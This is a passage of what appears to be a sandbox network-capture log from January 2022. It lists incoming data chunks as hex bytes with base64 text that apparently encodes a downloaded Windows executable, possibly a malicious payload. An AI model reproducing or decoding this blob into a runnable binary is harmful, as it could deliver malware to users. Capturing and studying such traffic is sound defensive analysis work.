55 51 2f 33 38 49 36 42 67 50 41 41 42 5a 0d 0a 68 6b Data Ascii: X0wYQ8g9YwcnMzMzDzMzMoZS/jaT+m4LUf5ytBxAGfBvF+W7OxON5T5pyI5nMX6iXgQ9XyfIPKsAPV8D9DyrBrLFss2drWk7GRBDyD1gEzfKQBhD9D1jBrg34rZ53X08ByfHHBgyRBhp0CmoDVuhrl6eMGDG5kRAKgAQAVYvsi08Mg+gPdDODhVkHYevaVjpGwegBdAUzwErrMOgn+///hl2bQ5PNqEHhgusf/3UQ/38I6BgPAABZhk
2022-01-30 12:43:18 UTC	520	IN	Data Raw: 4b 77 48 55 43 35 70 2b 4d 4e 47 42 69 76 2b 4f 32 76 66 2b 4c 64 53 54 2f 4e 76 56 31 47 50 39 36 46 46 66 6f 0d 0a 44 31 46 7a 51 65 4e 30 55 77 34 48 76 58 55 59 56 2b 69 7a 44 77 6f 41 61 41 41 4f 41 41 44 2f 47 48 43 4d 4d 6d 54 4e 49 6c 61 6f 4e 78 42 58 2f 33 55 49 36 4e 38 47 41 41 43 4d 78 44 69 46 0d 0a 72 53 78 30 46 6a 6a 61 59 61 2b 6f 76 56 39 65 57 31 33 44 56 59 48 73 67 2b 78 72 55 31 5a 58 35 69 56 72 63 71 68 6c 71 44 74 44 79 30 58 77 2f 33 55 4d 69 45 2f 6f 36 45 6b 41 41 41 43 4c 0d 0a 70 64 75 33 54 65 46 2f 72 38 32 75 76 51 2b 4d 63 77 4d 41 41 44 46 50 42 41 2b 43 61 67 4d 41 62 64 4d 75 53 65 6b 4a 4e 44 30 36 6f 67 2b 46 39 77 41 41 41 49 6c 37 45 41 4d 41 68 65 30 41 0d 0a 62 56 6a 79 4f 6e 77 53 55 74 31 4f 4e 68 61 42 65 78 Data Ascii: KwHUC5p+MNGBiv+O2vf+LdST/NvV1GP96FFfoD1FzQeN0Uw4HvXUYV+izDwoAaAAOAAD/GHCMMmTNIlaoNxBX/3UI6N8GAACMxDiFrSx0FjjaYa+ovV9eW13DVYHsg+xrU1ZX5iVrcqhlqDtDy0Xw/3UMiE/o6EkAAACLpdu3TeF/r82uvQ+McwMAADFPBA+CagMAbdMuSekJND06og+F9wAAAIl7EAMAhe0AbVjyOnwSUt1ONhaBex
2022-01-30 12:43:18 UTC	536	IN	Data Raw: 6f 76 51 2b 46 61 66 7a 2f 2f 34 47 4e 31 50 62 77 2f 34 58 4a 0d 0a 47 52 33 34 66 65 55 32 38 45 68 48 78 2f 38 50 68 59 67 41 41 41 6f 7a 77 46 43 47 68 64 54 30 6b 71 66 36 78 45 54 4d 71 4c 48 61 78 39 6a 30 2f 2f 39 51 6a 59 38 77 2f 76 2f 77 61 4d 77 42 0d 0a 62 56 67 6a 71 58 63 71 56 30 37 55 68 68 43 4c 6e 53 7a 2b 2f 2f 57 4a 6e 65 6a 35 2f 2f 2b 46 74 6c 66 32 72 57 67 79 56 33 32 65 71 77 55 42 41 41 41 7a 77 46 71 4a 68 64 54 37 2f 2f 2b 4a 0d 0a 36 48 53 4e 76 70 65 2f 30 70 61 6a 76 66 39 51 6a 59 55 77 2f 76 58 2f 61 4d 77 4f 41 41 42 51 68 59 4a 6b 51 57 69 78 6b 31 35 6c 67 75 6c 46 2f 2f 2f 2f 67 36 2f 55 39 50 2f 77 41 49 4f 6c 0d 0a 51 61 61 4d 76 6d 68 59 56 36 55 7a 77 66 38 42 64 4b 6d 46 32 33 36 74 4d 38 6b 38 39 6f 76 48 6d 76 Data Ascii: ovQ+Fafz//4GN1Pbw/4XJGR34feU28EhHx/8PhYgAAAozwFCGhdT0kqf6xETMqLHax9j0//9QjY8w/v/waMwBbVgjqXcqV07UhhCLnSz+//WJnej5//+Ftlf2rWgyV32eqwUBAAAzwFqJhdT7//+J6HSNvpe/0pajvf9QjYUw/vX/aMwOAABQhYJkQWixk15lgulF////g6/U9P/wAIOlQaaMvmhYV6Uzwf8BdKmF236tM8k89ovHmv
2022-01-30 12:43:18 UTC	552	IN	Data Raw: 77 67 2f 6a 2f 0d 0a 47 56 34 31 65 68 30 69 4b 35 49 49 47 56 35 64 77 34 76 2f 56 59 48 73 56 6a 50 35 4f 58 55 51 45 30 51 6b 79 68 55 6d 33 41 4e 66 46 66 39 31 44 4f 68 38 49 41 6f 41 67 7a 2f 77 64 41 5a 47 0d 0a 56 69 31 6a 50 59 46 74 43 52 4f 55 79 66 39 56 69 2b 78 57 4d 2f 77 35 64 52 42 78 49 56 4e 6d 59 75 59 75 54 54 2b 35 4b 6c 72 63 44 77 68 58 55 2b 69 4f 49 41 6f 41 67 7a 2f 77 64 41 5a 47 0d 0a 56 69 31 6a 50 59 4e 74 44 42 41 4b 67 59 76 2f 56 59 76 73 55 54 6e 41 69 55 33 7a 69 51 47 4a 4c 46 7a 36 41 47 43 37 46 6b 4c 65 41 78 43 4a 51 52 53 4a 51 52 4b 4a 51 52 79 47 51 53 43 4a 0d 0a 4c 48 7a 36 41 45 42 55 33 67 39 6e 79 30 45 34 69 45 45 38 69 59 74 41 42 41 41 50 69 59 46 45 61 56 68 7a 79 71 6e 37 6c 4d 57 6f 46 34 76 73 55 54 Data Ascii: wg/j/GV41eh0iK5IIGV5dw4v/VYHsVjP5OXUQE0QkyhUm3ANfFf91DOh8IAoAgz/wdAZGVi1jPYFtCROUyf9Vi+xWM/w5dRBxIVNmYuYuTT+5KlrcDwhXU+iOIAoAgz/wdAZGVi1jPYNtDBAKgYv/VYvsUTnAiU3ziQGJLFz6AGC7FkLeAxCJQRSJQRKJQRyGQSCJLHz6AEBU3g9ny0E4iEE8iYtABAAPiYFEaVhzyqn7lMWoF4vsUT
2022-01-30 12:43:18 UTC	568	IN	Data Raw: 44 74 62 76 58 55 49 36 41 54 2b 2f 2f 58 4d 69 2f 39 61 69 2b 79 4e 4b 45 67 6a 4b 32 6a 4e 49 6b 4b 6f 4e 77 6a 6f 54 76 2f 2f 2f 34 6e 45 45 46 33 4d 69 2f 39 56 0d 0a 35 72 54 2b 42 48 78 69 50 55 36 6f 4e 78 44 2f 64 51 7a 2f 64 51 4c 6f 56 66 2f 77 2f 34 50 45 65 51 57 77 79 70 64 6b 41 50 48 66 38 77 63 51 4d 2f 5a 71 41 47 4b 67 44 77 41 50 56 2b 6a 4b 0d 0a 43 56 68 7a 78 4b 68 47 54 37 46 53 6d 72 49 48 45 49 50 47 47 49 6e 48 47 49 48 78 55 41 45 41 62 53 71 6f 38 57 6e 5a 58 53 52 58 71 68 30 41 41 41 42 5a 4d 73 70 66 58 73 4f 45 2f 31 57 4c 0d 0a 67 54 4d 32 53 58 41 33 33 2f 39 51 55 6c 44 2f 46 52 42 67 42 68 70 64 77 34 76 77 56 6f 73 31 74 65 70 30 55 65 33 45 49 32 34 38 68 42 68 58 6a 62 68 77 73 51 30 51 56 2f 38 61 48 47 41 47 0d 0a Data Ascii: DtbvXUI6AT+//XMi/9ai+yNKEgjK2jNIkKoNwjoTv///4nEEF3Mi/9V5rT+BHxiPU6oNxD/dQz/dQLoVf/w/4PEeQWwypdkAPHf8wcQM/ZqAGKgDwAPV+jKCVhzxKhGT7FSmrIHEIPGGInHGIHxUAEAbSqo8WnZXSRXqh0AAABZMspfXsOE/1WLgTM2SXA33/9QUlD/FRBgBhpdw4vwVos1tep0Ue3EI248hBhXjbhwsQ0QV/8aHGAG
2022-01-30 12:43:18 UTC	584	IN	Data Raw: 51 34 41 74 38 65 70 6e 53 64 7a 51 52 31 49 33 41 4e 62 79 56 55 49 39 38 48 2f 2f 77 55 41 64 51 53 4b 30 6e 52 6f 0d 0a 73 34 48 4e 51 70 54 4e 71 4a 47 33 45 54 50 62 39 73 52 42 64 51 74 44 39 6b 55 42 45 48 55 66 62 70 48 36 44 47 53 33 68 54 64 52 77 63 6b 42 69 55 30 4d 41 39 68 4f 39 6b 55 42 45 48 54 6f 0d 0a 43 39 4d 4f 54 2b 46 6e 58 2f 61 34 76 51 41 41 5a 69 50 34 68 64 45 50 74 38 64 70 69 58 30 4f 4e 69 78 36 54 47 69 79 56 30 34 78 79 30 55 4f 33 55 55 49 61 67 70 52 55 64 30 54 4a 4f 67 78 0d 0a 62 56 68 7a 77 71 77 2b 76 47 30 39 51 6c 48 64 32 46 48 64 48 43 37 6f 48 67 41 50 41 41 2b 33 6d 74 75 33 54 61 6e 63 55 38 2b 78 76 51 63 41 41 49 48 75 2f 67 6b 41 41 46 2b 45 52 52 43 4a 0d 0a 58 51 59 75 67 75 50 4e 41 73 57 37 45 31 47 4c Data Ascii: Q4At8epnSdzQR1I3ANbyVUI98H//wUAdQSK0nRos4HNQpTNqJG3ETPb9sRBdQtD9kUBEHUfbpH6DGS3hTdRwckBiU0MA9hO9kUBEHToC9MOT+FnX/a4vQAAZiP4hdEPt8dpiX0ONix6TGiyV04xy0UO3UUIagpRUd0TJOgxbVhzwqw+vG09QlHd2FHdHC7oHgAPAA+3mtu3TancU8+xvQcAAIHu/gkAAF+ERRCJXQYuguPNAsW7E1GL
2022-01-30 12:43:18 UTC	600	IN	Data Raw: 44 70 62 77 58 34 59 2f 6e 51 47 67 45 51 6f 67 4f 74 32 69 38 66 47 0d 0a 4b 33 44 79 77 6f 41 79 49 31 37 55 71 67 46 30 42 34 50 6f 41 57 44 30 36 77 5a 6c 39 65 73 43 42 36 34 72 45 5a 63 6e 39 79 35 52 55 6f 76 59 67 2f 76 2f 64 41 65 46 32 33 51 47 55 2f 38 56 0d 0a 79 54 68 31 55 59 4d 77 5a 49 37 53 67 6e 51 63 44 37 62 41 69 56 51 59 67 2f 67 4e 64 51 61 41 49 33 41 7a 71 6b 47 78 72 30 30 69 5a 6f 42 4f 4b 41 6a 72 48 6f 70 4f 4b 45 44 49 52 68 6a 2b 0d 0a 6b 71 65 4d 34 46 79 47 55 46 37 53 67 6e 51 4b 69 77 53 34 78 30 6f 51 2f 76 2f 77 2f 30 65 44 6b 6c 74 38 78 44 2f 4e 71 4c 45 49 48 46 76 44 61 67 78 6f 2b 48 51 48 45 4f 67 50 37 66 37 2f 0d 0a 42 31 2b 62 68 4d 72 4e 71 42 64 6b 6d 59 68 64 35 34 6c 64 2f 46 6e 6f 4f 4a 51 50 41 46 6d 46 Data Ascii: DpbwX4Y/nQGgEQogOt2i8fGK3DywoAyI17UqgF0B4PoAWD06wZl9esCB64rEZcn9y5RUovYg/v/dAeF23QGU/8VyTh1UYMwZI7SgnQcD7bAiVQYg/gNdQaAI3AzqkGxr00iZoBOKAjrHopOKEDIRhj+kqeM4FyGUF7SgnQKiwS4x0oQ/v/w/0eDklt8xD/NqLEIHFvDagxo+HQHEOgP7f7/B1+bhMrNqBdkmYhd54ld/FnoOJQPAFmF
2022-01-30 12:43:18 UTC	616	IN	Data Raw: 51 63 66 5a 67 38 6f 0d 0a 57 4f 69 2f 52 33 68 55 57 42 65 59 4a 41 39 59 30 57 59 50 63 4d 44 75 38 67 39 57 31 2f 49 50 4e 59 6d 42 54 6a 44 6d 4d 55 46 46 5a 39 44 4d 42 68 42 6d 44 32 54 4b 67 65 71 50 2f 77 45 41 0d 0a 6d 6f 4b 79 75 32 2b 78 6c 55 7a 63 67 49 50 67 49 41 50 51 5a 67 56 58 2f 37 69 50 50 77 41 41 43 31 65 33 75 57 76 41 57 42 63 44 5a 68 54 79 44 31 6e 48 5a 67 56 7a 38 53 31 70 44 33 44 4a 0d 0a 4b 54 35 38 61 56 58 79 6d 30 68 48 73 41 39 59 36 6d 59 50 57 64 50 79 44 31 6a 4b 5a 67 38 55 72 54 35 38 47 4a 6a 41 57 42 65 33 4a 41 39 5a 77 47 59 50 57 50 52 6d 44 31 6e 33 38 67 39 5a 0d 0a 72 6a 35 38 4d 5a 2f 63 70 55 45 4f 68 57 59 50 63 4f 76 75 38 67 56 5a 38 2f 49 41 57 65 4e 6d 59 6a 61 4b 4a 32 64 42 6f 47 4d 78 54 57 37 53 Data Ascii: QcfZg8oWOi/R3hUWBeYJA9Y0WYPcMDu8g9W1/IPNYmBTjDmMUFFZ9DMBhBmD2TKgeqP/wEAmoKyu2+xlUzcgIPgIAPQZgVX/7iPPwAAC1e3uWvAWBcDZhTyD1nHZgVz8S1pD3DJKT58aVXym0hHsA9Y6mYPWdPyD1jKZg8UrT58GJjAWBe3JA9ZwGYPWPRmD1n38g9Zrj58MZ/cpUEOhWYPcOvu8gVZ8/IAWeNmYjaKJ2dBoGMxTW7S
2022-01-30 12:43:18 UTC	632	IN	Data Raw: 2b 56 30 35 58 77 53 63 41 6a 55 58 73 69 37 53 77 41 41 41 50 61 67 35 58 42 31 6b 6a 71 63 50 77 71 4c 48 61 43 51 53 4c 38 46 46 71 44 31 32 4e 52 65 78 6c 41 56 44 6f 0d 0a 2b 70 71 4d 76 6d 50 43 32 67 31 66 45 6d 6f 51 56 34 31 46 37 47 41 42 55 4f 69 4d 77 76 2f 2f 5a 71 6a 2b 41 6c 68 69 50 55 41 41 7a 30 58 73 61 67 4a 51 36 47 58 43 2f 2f 2b 4d 78 46 41 4c 0d 0a 6e 64 55 77 64 54 68 59 57 42 6e 61 42 2b 78 71 41 6c 44 6f 57 4d 6a 2f 2f 34 50 4c 46 41 76 47 47 58 49 67 71 51 72 4d 71 4c 45 45 71 70 70 32 2f 2f 2f 2f 64 66 4c 6f 6b 6e 62 77 2f 34 50 45 0d 0a 59 64 73 2b 74 5a 65 35 47 72 49 47 71 6f 4a 32 2f 2f 2b 4c 52 66 35 5a 36 33 43 45 55 77 6a 72 5a 74 55 37 6b 65 6a 4c 58 6a 6b 2f 79 67 70 43 69 67 4b 45 77 48 2f 76 69 33 33 33 69 33 55 49 Data Ascii: +V05XwScAjUXsi7SwAAAPag5XB1kjqcPwqLHaCQSL8FFqD12NRexlAVDo+pqMvmPC2g1fEmoQV41F7GABUOiMwv//Zqj+AlhiPUAAz0XsagJQ6GXC//+MxFALndUwdThYWBnaB+xqAlDoWMj//4PLFAvGGXIgqQrMqLEEqpp2////dfLoknbw/4PEYds+tZe5GrIGqoJ2//+LRf5Z63CEUwjrZtU7kejLXjk/ygpCigKEwH/vi333i3UI
2022-01-30 12:43:18 UTC	648	IN	Data Raw: 46 79 58 52 31 67 36 57 30 6c 61 65 4d 51 56 76 4e 33 4d 72 71 63 76 37 2f 2f 32 6f 4b 57 76 33 69 41 34 57 37 2b 50 2f 2f 0d 0a 35 4e 7a 4f 63 5a 62 4e 71 4d 32 46 51 6b 65 4a 6c 62 54 34 2f 2f 55 37 2b 58 58 57 69 37 32 34 6c 61 65 4d 78 4c 70 47 46 38 58 53 62 76 37 2f 2f 34 50 34 63 33 6b 50 69 5a 53 4b 4d 50 37 2f 0d 0a 6b 71 66 32 62 5a 62 4e 71 4b 56 78 63 63 42 51 69 59 57 63 39 76 58 2f 69 59 55 6a 2f 76 2f 2f 34 4e 33 54 74 35 66 4e 42 38 50 53 63 76 37 2f 2f 31 5a 51 36 42 48 53 2f 76 2b 4d 78 42 43 4e 0d 0a 36 41 53 50 76 70 64 69 32 73 74 37 76 50 2f 2f 55 4f 68 75 7a 50 54 2f 57 56 6d 45 6a 5a 7a 34 6b 71 63 5a 53 7a 49 4a 6c 55 48 53 42 41 45 41 41 49 75 46 58 50 62 2f 2f 34 31 32 41 66 2b 46 0d 0a 2b 61 43 4d 76 71 34 7a 5a 73 66 71 2b 76 Data Ascii: FyXR1g6W0laeMQVvN3Mrqcv7//2oKWv3iA4W7+P//5NzOcZbNqM2FQkeJlbT4//U7+XXWi724laeMxLpGF8XSbv7//4P4c3kPiZSKMP7/kqf2bZbNqKVxccBQiYWc9vX/iYUj/v//4N3Tt5fNB8PScv7//1ZQ6BHS/v+MxBCN6ASPvpdi2st7vP//UOhuzPT/WVmEjZz4kqcZSzIJlUHSBAEAAIuFXPb//412Af+F+aCMvq4zZsfq+v
2022-01-30 12:43:18 UTC	664	IN	Data Raw: 79 2f 33 45 6a 61 77 2b 33 30 43 50 57 77 65 67 45 71 41 52 37 41 34 50 4b 0d 0a 5a 66 42 37 4e 57 75 78 6e 55 72 2f 55 6e 51 44 67 38 6f 43 71 43 70 30 41 67 76 5a 71 41 4a 30 62 31 4f 6b 54 73 5a 76 72 38 55 53 75 6f 50 67 77 49 6c 46 39 41 57 75 56 66 53 45 52 66 69 6f 0d 0a 55 69 78 62 79 71 41 52 6d 59 2b 32 52 71 67 45 64 41 4f 44 79 51 4b 6f 43 48 51 4d 67 38 6b 45 78 55 67 48 51 75 76 37 56 65 5a 33 4e 67 49 4c 7a 71 67 43 64 41 67 4c 7a 77 76 46 69 38 46 66 0d 0a 68 6d 51 56 79 69 58 4f 5a 49 36 68 67 7a 39 30 4d 51 2b 33 77 53 6e 47 77 65 41 4c 39 73 45 45 47 56 76 77 69 57 44 45 6c 6b 59 6a 51 59 50 49 42 50 62 42 45 48 34 44 67 38 67 4e 39 73 45 67 0d 0a 47 56 70 34 68 35 37 7a 56 54 70 53 54 77 41 41 43 41 42 65 79 63 6d 4c 2f 31 57 45 37 49 Data Ascii: y/3Ejaw+30CPWwegEqAR7A4PKZfB7NWuxnUr/UnQDg8oCqCp0AgvZqAJ0b1OkTsZvr8USuoPgwIlF9AWuVfSERfioUixbyqARmY+2RqgEdAODyQKoCHQMg8kExUgHQuv7VeZ3NgILzqgCdAgLzwvFi8FfhmQVyiXOZI6hgz90MQ+3wSnGweAL9sEEGVvwiWDElkYjQYPIBPbBEH4Dg8gN9sEgGVp4h57zVTpSTwAACABeycmL/1WE7I
2022-01-30 12:43:18 UTC	680	IN	Data Raw: 4c 54 62 7a 6d 76 30 2f 37 0d 0a 6b 74 50 2b 6f 5a 62 4e 71 4b 65 54 46 76 76 2f 69 30 32 34 36 61 5a 50 2b 2f 2b 43 6a 52 54 2f 6b 71 65 61 38 44 7a 4a 71 4d 58 61 68 76 37 2f 2f 2b 6d 6d 56 50 48 2f 69 30 32 37 36 59 35 50 0d 0a 6c 71 66 34 7a 4e 54 4d 71 4c 47 2b 30 56 54 37 2f 34 32 4e 48 50 54 2f 2f 2b 6d 48 56 50 76 2f 35 74 58 62 76 35 66 4e 76 6a 4d 44 75 66 2b 4c 6a 61 44 2b 2f 2f 58 70 63 6c 54 30 2f 34 32 4e 0d 0a 61 61 61 4d 76 6f 46 56 41 37 57 6f 79 59 32 51 2f 76 2f 2f 36 56 5a 55 2b 2f 2b 45 6a 59 6a 2b 6b 71 65 61 45 44 7a 4a 71 4d 50 61 72 76 33 2f 2f 2b 6c 47 56 50 48 2f 69 34 31 33 2f 76 2f 2f 0d 0a 68 47 4d 6e 75 70 65 35 32 69 61 70 76 66 2f 70 4d 46 54 37 2f 34 47 4e 57 50 37 77 2f 2b 6b 6c 4f 61 4f 4d 79 75 56 36 71 62 47 6f 71 78 Data Ascii: LTbzmv0/7ktP+oZbNqKeTFvv/i0246aZP+/+CjRT/kqea8DzJqMXahv7//+mmVPH/i0276Y5Plqf4zNTMqLG+0VT7/42NHPT//+mHVPv/5tXbv5fNvjMDuf+LjaD+//XpclT0/42NaaaMvoFVA7WoyY2Q/v//6VZU+/+EjYj+kqeaEDzJqMParv3//+lGVPH/i413/v//hGMnupe52iapvf/pMFT7/4GNWP7w/+klOaOMyuV6qbGoqx
2022-01-30 12:43:18 UTC	696	IN	Data Raw: 4f 4e 6e 71 78 7a 63 42 2f 68 51 36 48 2f 50 2f 66 58 47 67 45 53 6c 42 78 41 41 68 70 37 34 70 44 58 78 6d 34 49 43 79 65 79 44 37 41 67 50 56 38 70 6d 44 78 4e 4b 2b 4f 73 53 0d 0a 35 68 32 4c 77 71 67 7a 33 41 4f 72 77 64 45 41 69 55 58 34 69 55 66 38 67 33 33 7a 41 48 63 69 48 31 37 77 50 4a 41 76 4a 46 51 39 51 6d 6f 42 69 31 58 38 55 6f 46 46 2b 46 44 6e 4c 38 2f 39 0d 0a 6b 70 37 7a 6c 63 67 31 52 30 36 38 68 49 76 6c 58 63 50 4d 7a 46 2b 4c 37 49 50 6a 43 41 39 58 72 54 35 38 55 69 33 4b 76 46 7a 63 42 2f 69 44 77 41 47 4c 54 66 61 44 30 51 43 47 52 66 69 4a 0d 0a 49 4b 54 77 50 4a 51 79 49 47 77 6c 52 49 4e 39 2b 41 52 7a 47 6d 41 41 61 67 47 45 56 66 78 53 35 68 32 4c 45 59 44 74 6d 62 4f 6f 68 49 42 77 6f 67 63 51 41 4f 48 47 69 2b 56 53 77 38 Data Ascii: ONnqxzcB/hQ6H/P/fXGgESlBxAAhp74pDXxm4ICyeyD7AgPV8pmDxNK+OsS5h2Lwqgz3AOrwdEAiUX4iUf8g33zAHciH17wPJAvJFQ9QmoBi1X8UoFF+FDnL8/9kp7zlcg1R068hIvlXcPMzF+L7IPjCA9XrT58Ui3KvFzcB/iDwAGLTfaD0QCGRfiJIKTwPJQyIGwlRIN9+ARzGmAAagGEVfxS5h2LEYDtmbOohIBwogcQAOHGi+VSw8
2022-01-30 12:43:18 UTC	712	IN	Data Raw: 50 38 44 41 41 41 4b 41 41 41 41 66 56 68 7a 51 57 55 79 56 30 35 67 51 67 41 41 45 77 41 41 41 47 34 4a 41 41 41 66 41 41 41 41 0d 0a 2f 46 68 7a 51 55 45 79 56 30 35 63 51 77 41 41 46 67 41 41 41 48 6f 41 41 41 41 54 41 41 41 41 50 56 68 7a 51 58 6b 79 56 30 35 56 51 67 41 41 41 67 41 41 41 43 30 41 41 41 41 54 41 41 41 41 0d 0a 59 56 68 7a 51 57 55 79 56 30 35 59 51 67 41 41 45 77 41 41 41 41 73 41 41 41 41 6e 41 41 41 41 61 31 68 7a 51 58 34 79 56 30 34 73 51 67 41 41 41 67 41 41 41 46 30 41 41 41 41 5a 41 41 41 41 0d 0a 54 46 68 7a 51 55 38 79 56 30 36 44 51 67 41 41 4a 77 41 41 41 49 6b 41 41 41 41 5a 41 41 41 41 69 31 74 7a 51 57 55 79 56 30 35 66 51 67 41 41 44 41 41 41 41 42 38 41 41 41 41 45 41 41 41 41 0d 0a 66 46 68 7a 51 58 6f 79 56 30 35 6c Data Ascii: P8DAAAKAAAAfVhzQWUyV05gQgAAEwAAAG4JAAAfAAAA/FhzQUEyV05cQwAAFgAAAHoAAAATAAAAPVhzQXkyV05VQgAAAgAAAC0AAAATAAAAYVhzQWUyV05YQgAAEwAAAAsAAAAnAAAAa1hzQX4yV04sQgAAAgAAAF0AAAAZAAAATFhzQU8yV06DQgAAJwAAAIkAAAAZAAAAi1tzQWUyV05fQgAADAAAAB8AAAAEAAAAfFhzQXoyV05l
2022-01-30 12:43:18 UTC	728	IN	Data Raw: 55 67 79 4c 6b 34 34 51 6e 55 41 63 67 41 67 41 48 6f 41 63 67 42 67 41 47 63 41 0d 0a 48 31 67 53 51 51 55 79 64 30 34 30 51 6d 45 41 62 67 41 67 41 47 6b 41 59 51 42 36 41 48 4d 41 43 46 68 54 51 51 6b 79 4f 55 35 33 51 6d 45 41 63 77 42 7a 41 47 38 41 63 67 42 37 41 47 6b 41 0d 0a 41 6c 67 64 51 57 49 79 4d 55 34 32 51 6d 6b 41 62 41 42 31 41 48 67 41 5a 51 41 6a 41 43 41 41 48 6c 67 57 51 51 30 79 64 30 34 6a 51 6d 67 41 5a 51 41 67 41 46 77 41 61 51 42 38 41 48 55 41 0d 0a 44 46 67 66 51 55 67 79 46 45 35 38 51 69 73 41 49 41 42 6b 41 47 55 41 59 77 42 36 41 47 30 41 43 46 67 64 51 52 77 79 4e 6b 34 6a 51 6d 6b 41 62 77 42 75 41 43 6f 41 62 77 42 68 41 43 41 41 0d 0a 44 46 67 41 51 52 73 79 4d 6b 34 6c 51 6e 51 41 63 77 41 41 41 43 49 41 55 41 42 39 Data Ascii: UgyLk44QnUAcgAgAHoAcgBgAGcAH1gSQQUyd040QmEAbgAgAGkAYQB6AHMACFhTQQkyOU53QmEAcwBzAG8AcgB7AGkAAlgdQWIyMU42QmkAbAB1AHgAZQAjACAAHlgWQQ0yd04jQmgAZQAgAFwAaQB8AHUADFgfQUgyFE58QisAIABkAGUAYwB6AG0ACFgdQRwyNk4jQmkAbwBuACoAbwBhACAADFgAQRsyMk4lQnQAcwAAACIAUAB9
2022-01-30 12:43:18 UTC	744	IN	Data Raw: 47 38 45 41 41 44 66 36 41 59 51 0d 0a 42 6c 78 7a 51 59 6a 61 55 56 34 37 52 67 41 41 38 4f 67 47 45 49 73 45 41 41 44 7a 36 41 59 51 62 46 42 7a 51 57 44 62 55 56 35 54 53 67 41 41 50 4d 34 47 45 41 30 49 41 41 41 62 36 51 59 51 0d 0a 5a 46 42 7a 51 55 6a 62 55 56 35 64 53 67 41 41 4c 4f 6b 47 45 41 59 49 41 41 41 33 36 51 59 51 66 56 42 7a 51 53 7a 62 55 56 35 45 53 67 41 41 55 4f 6b 47 45 42 34 49 41 41 42 54 36 51 59 51 0d 0a 65 31 42 7a 51 51 44 62 55 56 35 4e 53 67 41 41 64 4f 6b 47 45 42 63 49 41 41 43 44 36 51 59 51 51 56 42 7a 51 66 44 62 55 56 35 73 53 67 41 41 73 4f 6b 47 45 44 51 49 41 41 43 7a 36 51 59 51 0d 0a 4c 6c 42 7a 51 61 44 62 55 56 34 38 53 67 41 41 34 4f 6b 47 45 41 73 4d 41 41 44 2f 36 51 59 51 61 56 52 7a 51 5a 54 62 55 56 35 51 Data Ascii: G8EAADf6AYQBlxzQYjaUV47RgAA8OgGEIsEAADz6AYQbFBzQWDbUV5TSgAAPM4GEA0IAAAb6QYQZFBzQUjbUV5dSgAALOkGEAYIAAA36QYQfVBzQSzbUV5ESgAAUOkGEB4IAABT6QYQe1BzQQDbUV5NSgAAdOkGEBcIAACD6QYQQVBzQfDbUV5sSgAAsOkGEDQIAACz6QYQLlBzQaDbUV48SgAA4OkGEAsMAAD/6QYQaVRzQZTbUV5Q
2022-01-30 12:43:18 UTC	760	IN	Data Raw: 6e 66 56 44 71 4c 6e 46 32 56 53 68 37 50 63 31 49 50 51 6f 41 49 4a 61 37 6b 58 6f 2f 31 7a 78 66 42 6e 66 7a 46 58 4e 58 51 74 54 43 4e 6b 74 37 50 39 69 64 38 75 70 4b 43 55 30 39 0d 0a 62 56 6a 6e 67 39 59 32 4b 33 45 67 2f 44 4f 49 4d 65 63 68 50 51 6f 41 74 4a 56 44 76 6e 77 2f 30 71 41 74 55 54 41 66 45 58 4e 58 51 70 67 38 34 48 64 39 50 7a 6f 63 6b 4a 34 75 68 55 38 39 0d 0a 62 56 6a 54 39 68 45 44 4b 58 45 72 59 4d 53 76 2b 31 45 38 50 51 6f 41 4a 41 63 57 36 33 34 2f 31 36 73 59 79 41 34 31 46 33 4e 58 51 6f 51 72 76 71 52 2f 50 35 59 58 75 6d 4b 4d 56 55 4d 39 0d 0a 62 56 6a 6a 30 31 77 64 31 33 46 39 7a 30 74 66 79 7a 77 71 50 51 6f 41 50 4a 72 5a 64 49 41 2f 75 46 36 2f 7a 42 41 35 48 6e 4e 58 51 67 34 79 73 64 47 41 50 33 31 5a 7a 31 59 71 Data Ascii: nfVDqLnF2VSh7Pc1IPQoAIJa7kXo/1zxfBnfzFXNXQtTCNkt7P9id8upKCU09bVjng9Y2K3Eg/DOIMechPQoAtJVDvnw/0qAtUTAfEXNXQpg84Hd9PzockJ4uhU89bVjT9hEDKXErYMSv+1E8PQoAJAcW634/16sYyA41F3NXQoQrvqR/P5YXumKMVUM9bVjj01wd13F9z0tfyzwqPQoAPJrZdIA/uF6/zBA5HnNXQg4ysdGAP31Zz1Yq
2022-01-30 12:43:18 UTC	776	IN	Data Raw: 51 50 77 6f 41 41 41 44 76 74 4d 38 2f 62 56 68 7a 51 59 69 47 6d 48 46 58 51 67 41 41 67 47 2f 50 50 77 6f 41 41 41 43 50 62 38 38 2f 0d 0a 62 56 68 7a 51 55 67 59 6d 48 46 58 51 67 41 41 49 43 72 50 50 77 6f 41 41 41 44 50 35 4d 34 2f 62 56 68 7a 51 61 6a 57 6d 58 46 58 51 67 41 41 59 4a 2f 4f 50 77 6f 41 41 41 42 76 6e 38 34 2f 0d 0a 62 56 68 7a 51 57 68 6f 6d 58 46 58 51 67 41 41 41 46 72 4f 50 77 6f 41 41 41 43 66 47 38 34 2f 62 56 68 7a 51 66 67 70 6d 58 46 58 51 67 41 41 4d 4e 62 4e 50 77 6f 41 41 41 41 2f 31 73 30 2f 0d 0a 62 56 68 7a 51 61 69 6c 6d 6e 46 58 51 67 41 41 77 4a 66 4e 50 77 6f 41 41 41 42 66 57 63 30 2f 62 56 68 7a 51 54 68 72 6d 6e 46 58 51 67 41 41 34 42 72 4e 50 77 6f 41 41 41 44 76 47 73 30 2f 0d 0a 62 56 68 7a 51 51 6a 52 6d 33 Data Ascii: QPwoAAADvtM8/bVhzQYiGmHFXQgAAgG/PPwoAAACPb88/bVhzQUgYmHFXQgAAICrPPwoAAADP5M4/bVhzQajWmXFXQgAAYJ/OPwoAAABvn84/bVhzQWhomXFXQgAAAFrOPwoAAACfG84/bVhzQfgpmXFXQgAAMNbNPwoAAAA/1s0/bVhzQailmnFXQgAAwJfNPwoAAABfWc0/bVhzQThrmnFXQgAA4BrNPwoAAADvGs0/bVhzQQjRm3
